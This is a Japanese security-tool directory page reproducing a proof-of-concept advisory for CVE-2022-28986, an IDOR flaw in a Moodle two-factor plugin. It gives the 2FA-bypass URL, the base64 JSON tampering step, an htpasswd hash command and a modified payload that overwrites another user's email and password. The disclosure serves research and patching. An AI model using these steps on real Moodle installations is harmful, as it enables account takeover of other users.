Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-28986 — LMS Doctor 製の「Simple 2FA Plugin for Moodle」における安全でない直接オブジェクト参照(IDOR)の脆弱性 | Kitploit
ツール/GitHubGitHub/flaviupopescu/cve-2022-28986
脆弱性分析IDS/IPS回避ウェブアプリケーション悪用ペネトレーションテスト認証学習と教育
GitHubflaviupopescu/cve-2022-28986

CVE-2022-28986

LMS Doctor 製の「Simple 2FA Plugin for Moodle」における安全でない直接オブジェクト参照(IDOR)の脆弱性

リポジトリを見る
2104年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-28986

LMS Doctor による「Moodle 用 Simple 2FA プラグイン」における安全でない直接オブジェクト参照 (IDOR) の脆弱性

脆弱性の詳細

リスク: 重大 (Critical)

ベンダー: LMS Doctor - Simple 2 Factor Authentication Plugin For Moodle

報告者: Flaviu Popescu

説明: LMS Doctor による「Moodle 用 Simple 2FA プラグイン」には、安全でない直接オブジェクト参照 (IDOR) の脆弱性が存在します。これにより、リモートの攻撃者は他のユーザーアカウントのメールアドレス、パスワード、電話番号などの機微なレコードを更新することができます。

概念実証:

自己登録したアカウント (dionach.tester) を使用した初期ログインプロセス:

POST /login/index.php

image

2FA プロンプトが表示されたら、攻撃者は 2FA コードを入力する代わりに以下の URL へ強制ブラウズします。

POST /auth/simple2fa/profile.php

image

このリクエストは Burp Suite で取得されます: image

パラメータ「u」には base64 エンコードされた文字列が含まれています。この文字列をデコードすると、以下に示す JSON 形式のデータが明らかになります:

image

攻撃者は JSON データを改ざんし、id、電子メール、パスワード、名前を変更します。JSON データは再び base64 にエンコードされ、Burp Suite で更新されてサーバーに転送されます。

パスワードの新しいハッシュの生成:

$ htpasswd -bnBC 10 "" pwn3d! | tr -d ':\n'\n
$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy                     

改変されたデータのスニペット:

{"id":"8045","auth":"email","confirmed":"1","policyagreed":"0","deleted":"0","suspended":"0","mnethostid":"1","username":"dionach.tester2","password":"$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy","idnumber":"","firstname":"Dio","lastname":"Nach","email":"flaviu.popescu+1337@[..]", [..]

その結果、被害者のアカウント (ID 8045、dionach.tester2) が以下のように更新されます:

image

ツールをダウンロード